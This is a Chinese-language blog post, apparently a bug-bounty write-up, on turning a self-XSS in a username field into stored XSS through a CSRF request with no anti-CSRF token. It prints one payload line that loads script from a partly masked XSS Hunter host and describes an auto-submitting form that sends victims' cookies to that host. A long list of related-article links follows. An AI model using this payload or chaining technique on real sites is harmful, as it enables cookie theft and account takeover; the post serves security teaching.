通过组合Self-XSS + CSRF得到存储型XSS

最新推荐文章于 2024-09-03 16:47:17 发布
最新推荐文章于 2024-09-03 16:47:17 发布
阅读量274 收藏 2
点赞数 6
文章标签: xss csrf 前端 webpack node.js 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/141856044
版权

在一次漏洞赏金挖掘中,我在更改用户名的功能点出发现了一个XSS,在修改用户名的地方添加了一个简单的XSS payload并且刷新页面:

图片

用户设置面板

图片

XSS证明

但是问题是这个功能配置并不是公共的,造成XSS漏洞的唯一方法是告诉受害者将其名称更改为恶意JavaScript代码,这称为Self-XSS,没有太大影响。

接下来,我使用burpsuite抓取 改变名字这个功能点的数据包:

图片

从数据包来看,没有看到防御csrf的token,这看起来有可利用的点,于是我使用burpsuite 生成了CSRF poc

并在浏览器中重放,而得到的响应是:success

图片

nice!现在我们有了CSRF + Self-XSS,让我们将它们组合在一起,表单如下:

图片

最终POC

在名字字段我添加了JavaScript代码它是从xsshunter.com:https://xsshunter.com/生成的XSS PoC

“><script src=https://***.xss.ht></script>

在最后我添加了JavaScript自动提交表单,使其更有效。

现在,用户名更改为JavaScript代码后,浏览主页的代码将在目标的浏览器中加载,并向XSS hunter平台发送回cookie。

图片

存储XSS

回到XSSHunter,当任何用户打开我们的HTML表单时,平台获取到了目标cookie,由此我们可得到了一个Stored XSS(存储型XSS)。

图片

获取网络安全优质学习资料与干货教程+

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

黑客大佬
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
学习 xss+csrf 组合
weixin_67259816的博客
05-28 3275
该篇文章记录了xss+csrf组合拳,无论是存储xss还是反射xsscsrf结合在一块,都会有一个更强大的收获。
漏洞组合拳之XSS+CSRF记录
金色%夕阳的博客
08-20 763
漏洞组合拳之XSS+CSRF记录 0x00 前言 0x01 靶场环境 0x02 组合拳思路 0x03 【第一拳】存储 XSS + CSRF 1、构造 POC 2、 开工 0x04 【第二拳】CSRF + SelfXSS 1、构造 POC 0x05 总结
XSS+CSRF组合
weixin_50464560的博客
03-12 2454
0x00 前言 今天学习一下 XSS + CSRF 组合拳,现将笔记记录如下。 0x01 靶场环境 本机(Win):192.168.38.1 DVWA(Win):192.168.38.132 Beef(Kali):192.168.38.129 0x02 组合拳思路 第一拳:存储 XSS + CSRF存储 XSS 攻击代码中加入 CSRF 代码链接) 第二拳:CSRF + SelfXSSCSRF 代码中加入 SelfXSS 代码) 0x03...
CSRF+Self XSS
newlife1441的博客
08-16 598
CSRF,跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。。防御原理:由于服务端没有对客户端进行身份校验,所以我们可以通过添加令牌token、验证码等方法来防御csrfCSRF 利用的是网站对用户浏览器的信任。Self XSS,自己输入xss脚本,输出仅自己看到,仅xss。............
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
存储XSS则更为严重,因为它将恶意脚本存储在服务器上,任何访问该页面的用户都可能受到攻击。DOMXSS则通过修改DOM(Document Object Model)来注入和执行恶意代码。 在XSS攻击中,攻击者可能会窃取用户的会话...
跨站攻击(XSS+CSRF).docx
01-05
2. 存储XSS:这种攻击更为危险,因为恶意脚本被存储在服务器上,然后在多个用户访问同一页面时执行。比如,攻击者在论坛发帖或评论中插入脚本,当其他用户查看时,脚本被执行。 3. DOMXSS:此类XSS发生在客户端...
xss+csrf组合
wo41ge的博客
12-16 3252
今天 就把之前学的东西简单的总结一下吧 【第一拳】存储 XSS + CSRF
SRC漏洞挖掘 存储self-xss变有效xss(两个iframe实现)
beishanxueyuan的博客
06-28 720
src漏洞挖掘思路教学 存储self-xss变有效xss(两个iframe实现)
xss.haozi.me
m0_52484587的博客
09-03 488
函数内部定义了一个正则表达式 `stripBracketsRe`,它匹配所有的圆括号字符。然后使用 `String.prototype.replace` 方法和这个正则表达式来替换字符串中的所有圆括号为空字符串(即删除它们)。它接受一个字符串 `input` 作为参数,并返回一个新的字符串,其中所有圆括号 `(` 和 `)` 都被移除了。1. 限定开头: 比如, /^A/会匹配"An e"中的A,但是不会匹配"ab A"中的A。所以,总的来说,[^>]+ 匹配了除了^的任意字符的一次或者多次。
【web安全XSS
m0_71944965的博客
09-02 659
XSS全称(Cross Site Scripting)跨站脚本攻击,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。这就意味着XSS可以进行“服务端”攻击,因为管理员要比普通用户的权限大得多,一般管理员都可以对网站进行文件管理,数据管理等操作,而攻击者一般也是靠管理员身份作为“跳板”进行实施攻击。XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码,最常用的攻击代码是javascript语言,但也会使用其它的脚本语言。
【网络安全Self XSS + 文件上传CSRF
最新发布
等风来
09-03 171
利用Burp Suite对请求进行了深入分析,发现文件上传操作会通过 `filename` 变量来传递上传文件的名称。我尝试在文件名中输入随机文本,试图找到反射点,但最初并没有任何效果。后来,我修改了文件的扩展名为“helloworld.fakeext”,成功触发了一个错误消息
57-java csrf防御方案
weixin_41775999的博客
09-01 257
当用户请求一个创建表单的页面时,服务器会生成一个唯一的令牌,并将其保存在session中,然后在表单中插入这个令牌。当用户提交表单时,服务器会检查表单中的令牌与session中的令牌是否一致,如果一致,则认为是合法的请求。服务器在响应中发送一个名为X-CSRF-Token的头信息,并要求客户端在后续的请求中将其作为X-CSRF-Token头信息进行发送。CSRF(跨站请求伪造)是一种攻击手段,它迫使已登录用户的web应用在没有用户知情的情况下,发送未经授权的请求。通常,同步令牌是最简单且易于实现的方法。
从面向对象(OOP)到面向切面(AOP):编程范式的演变
妍思码匠的博客
08-30 1338
本文深入探讨了面向切面编程(AOP)在前端开发中的应用,解释了AOP如何通过动态增强与代码复用、降低模块间耦合度,为前端项目带来更高效、更模块化的解决方案。通过具体案例分析,如日志记录切面和动态埋点的实现,展示了如何利用装饰器模式、高阶组件等技术在前端实现AOP。理解AOP的原理与实践,将有助于开发者构建更易于维护和扩展的前端应用。无论你是前端新手还是资深开发者,本文都将为你提供有价值的见解和实用技巧。
深入理解JavaScript闭包:避免常见的内存泄漏问题
官方推荐
09-02 3303
深入理解JavaScript闭包:避免常见的内存泄漏问题
WHAT - React 函数与 useMemo vs useCallback
weixin_58540586的博客
09-03 436
目录介绍`useMemo` 与 `useCallback` 的区别示例代码`useMemo` 示例`useCallback` 示例总结 介绍 在 React 中,useMemo 和 useCallback 是两个用于性能优化的钩子,尽管它们有些相似,但各自有不同的用途和应用场景。理解它们的区别和适用情况可以帮助你更有效地管理组件的性能和状态。 useMemo 与 useCallback 的区别 useMemo: 目的: 用于记忆化(缓存)计算结果。它接受一个计算函数和依赖项数组,只有当依赖项发生变化时
材料表面缺陷检测系统源码分享 # [一条龙教学YOLOV8标注好的数据集一键训练_70+全套改进创新点发刊_Web前端展示]
xuehai996的博客
08-29 2394
材料表面缺陷检测系统源码分享 # [一条龙教学YOLOV8标注好的数据集一键训练_70+全套改进创新点发刊_Web前端展示]
KEYSIGHT是德 Infiniium EXR系列 示波器
XLTYQYB的博客
08-29 1415
该系列的所有号都集成了一个 10 位 ADC,并且在所有通道上同时提供 16 GSa/s 的采样率。高分辨率 ADC 的效用取决于示波器的前端底噪是否足够低以提供与之匹配的额外的量化电平空间。我们的低噪声前 端包含定制 IC,例如 130 纳米 BiCMOS IC(其中集成了用户可选的模拟滤波器),并且带宽可通过软件 许可证升级。使用硬件滤波时,噪声低至 43 μV,系统 ENOB 达到 9.0 位。Infiniium EXR系列 示波器 号比较。垂直分辨率是 8 位示波器的 4 倍。
vue3+ts封装一个uniapp的自动滚动列表,实现看板效果
qq_51384850的博客
08-31 882
自行配置滚动时间,滚动的高度默认为一行数据的高度,当数据更新的时候,会对新旧数据进行比较,在旧数据的基础上删除解除异常了的数据,将新增异常数据加到数据的最顶部,重新开始从顶部滚动,实现数据在电视机上的实时刷新和展示
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值